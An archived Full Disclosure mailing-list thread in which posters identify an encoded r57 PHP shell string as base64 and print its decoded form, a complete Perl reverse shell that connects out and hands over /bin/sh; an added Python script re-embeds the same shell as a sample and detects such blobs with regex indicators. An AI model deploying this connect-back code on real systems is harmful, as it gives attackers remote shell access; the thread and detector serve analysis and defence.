Full Disclosure mailing list archives
Re: connect back PHP hack
From: webDEViL <w3bd3vil () gmail com>
Date: Wed, 11 Feb 2009 00:24:15 +0530
Must be off the r57 php shell.

Regards,
webDEViL

On Wed, Feb 11, 2009 at 12:14 AM, Razi Shaban <razishaban () gmail com> wrote:
> On Tue, Feb 10, 2009 at 8:23 PM, sr. <staticrez () gmail com> wrote:
>> Can anyone tell me what encoding this is?
>>
>> $back_connect="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";
>>
>> This has to do with old php 4.x.x version with magic quotes enabled. I'm just trying to figure out what the connect back code does. Any input is much appreciated.
>>
>> thx,
>> sr.
>
> Base64, the "==" at the end gives it away. It decrypts to:
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";/bin/sh';
> $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
> --
> Regards,
> Razi Shaban
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
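The thread above decodes a single `$back_connect` literal by hand. When triaging a PHP webshell such as r57 or c99 there are usually several embedded base64 blobs (connect-back, bind shell, datapipe), so it helps to automate the step Razi did manually: pull every long base64-looking string literal out of the PHP source, decode it, and flag the ones that have the shape of a connect-back shell. The script below is an added example written for this page, not code from the thread or from any of the shells mentioned. The sample PHP file it scans is constructed inline by re-encoding the Perl payload quoted above; the indicator names and regexes are this example's own choices, not a published signature set.

```python
import base64
import binascii
import re

# Constructed sample input: the Perl connect-back that Razi decoded, as it
# appears on the list, re-encoded here so the script has a realistic blob to
# find. The original base64 string from sr.'s mail is not reproduced.
PERL_CONNECT_BACK = r'''#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
'''

SAMPLE_PHP = (
    '<?php\n'
    '$back_connect="' + base64.b64encode(PERL_CONNECT_BACK.encode()).decode() + '";\n'
    '?>\n'
)

# A quoted run of 40+ base64 alphabet characters with optional "=" padding.
# Short literals are skipped to avoid decoding ordinary identifiers.
B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{40,}={0,2})["\']')

# Indicators (this example's own naming) for a Perl connect-back shell:
# a socket is opened to a remote host, stdin/stdout/stderr are dup'd onto it,
# a shell is spawned, and $0 is rewritten so the process shows up in ps under
# a harmless name ("lynx" in the sample).
INDICATORS = {
    "perl_socket":         re.compile(r"use\s+Socket"),
    "tcp_connect":         re.compile(r"connect\s*\(\s*SOCKET"),
    "stdio_dup_to_socket": re.compile(r'open\s*\(\s*STD(?:IN|OUT|ERR)\s*,\s*">&SOCKET"'),
    "shell_spawn":         re.compile(r"/bin/sh|system\s*\("),
    "process_rename":      re.compile(r"\$0\s*="),
}

# Both of these must be present before we call a blob a connect-back shell.
CONNECT_BACK_REQUIRED = {"tcp_connect", "stdio_dup_to_socket"}


def decode_candidates(php_source):
    """Return (blob, decoded_text) for every long base64 literal that decodes to UTF-8 text."""
    found = []
    for match in B64_LITERAL.finditer(php_source):
        blob = match.group(1)
        try:
            raw = base64.b64decode(blob, validate=True)
        except (ValueError, binascii.Error):
            continue  # not valid base64 (bad length/padding); skip it
        try:
            found.append((blob, raw.decode("utf-8")))
        except UnicodeDecodeError:
            continue  # binary payload (e.g. an ELF); out of scope for this text scan
    return found


def classify(decoded_text):
    """Return the sorted list of indicator names that fire on the decoded payload."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded_text))


def triage(php_source):
    """Decode every embedded base64 literal and report which look like connect-back shells."""
    report = []
    for blob, text in decode_candidates(php_source):
        hits = classify(text)
        report.append({
            "encoded_len": len(blob),
            "padded": blob.endswith("="),   # the "==" Razi pointed at is just this
            "hits": hits,
            "is_connect_back": CONNECT_BACK_REQUIRED <= set(hits),
            "decoded": text,
        })
    return report


if __name__ == "__main__":
    for entry in triage(SAMPLE_PHP):
        print(f"blob of {entry['encoded_len']} chars, padded={entry['padded']}, "
              f"connect_back={entry['is_connect_back']}, hits={entry['hits']}")
```

On a real sample, feed `triage()` the contents of the PHP file instead of `SAMPLE_PHP`; the `decoded` field gives you the cleartext to read, and `hits` tells you at a glance whether a blob is the connect-back, something else (a bind shell will lack `tcp_connect`), or noise. Note that validating padding strictly means a blob that was wrapped or truncated during copy-paste is skipped rather than misdecoded, so an empty report on a file you know contains base64 is a cue to check the literal, not to clear the file.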
Current thread:
- connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack Simon Smith (Feb 10)
- Re: connect back PHP hack Simon Smith (Feb 10)
- Re: connect back PHP hack Razi Shaban (Feb 10)
- Re: connect back PHP hack Simon Smith (Feb 10)
- Re: connect back PHP hack Razi Shaban (Feb 10)
- Re: connect back PHP hack Simon Smith (Feb 10)
- Re: connect back PHP hack Simon Smith (Feb 10)
- Re: connect back PHP hack webDEViL (Feb 10)
- [SPAM] Re: connect back PHP hack Ricky Zhou (Feb 10)
- Re: connect back PHP hack Anastasios Monachos (Feb 10)
- Re: connect back PHP hack Gustavo Castro (Feb 10)
- Re: connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack Justin Rogosky (Feb 11)
- Re: connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack ilaiy (Feb 10)
- Re: connect back PHP hack Joe Klemencic (Feb 10)
- Re: connect back PHP hack crony (Feb 10)
- Re: connect back PHP hack Joren Gaucher (Feb 10)
- Re: connect back PHP hack Clement Dupuis (Feb 10)